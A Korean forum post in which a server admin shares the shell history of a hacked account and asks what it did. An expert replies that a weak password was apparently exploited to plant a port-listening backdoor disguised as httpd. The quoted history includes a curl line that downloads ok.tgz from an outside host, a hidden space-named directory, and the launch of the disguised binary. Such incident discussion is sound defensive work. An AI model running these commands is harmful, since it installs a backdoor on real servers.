해킹 당한것같아서 문의드립니다.

안녕하십니까? 오늘과내일의 홍석범입니다.

아래의 경우 일반적으로 쉬운암호를 사용하는 계정으로 로그인후
/var/tmp/ / 디렉토리에 백도어를 설치하고
특정 포트를 리슨(bind)하는 프로그램을 실행한 것으로 보입니다.
그리고, 백도어의 이름은 httpd로 하여 마치 정상적인 프로세스인것처럼 보이도록
설정하였습니다...

감사합니다.

보라돌이 님의 글

오늘 서버 점검중 해킹을 당한것같아 문의드립니다.

해킹된 계정의 히스토리 정보입니다.

===================================

w
ps -x
uname -a
cd /var/tmp
ls -a
mkdir " "
cd " "
curl -O cubitus.go.ro/ok.tgz
passwd
tar -zxvf ok.tgz
rm -rf ok.tgz
cd ok
chmod +x [httpd]
PATH=:.PATH
[httpd]
exit
==================================

일단 그 계정은 삭제 햇구요 ,,

당연히 설치된 파일도 삭제는 했습니다.

그래도 왠지 찜찜해서 문의드리는건데..

위 설치된 파일이 과연 어떤 작업을 하는 것이며..

일단 삭제는 햇는데 문제는 없는지.궁금하네요..

많은 의견 부탁드립니다.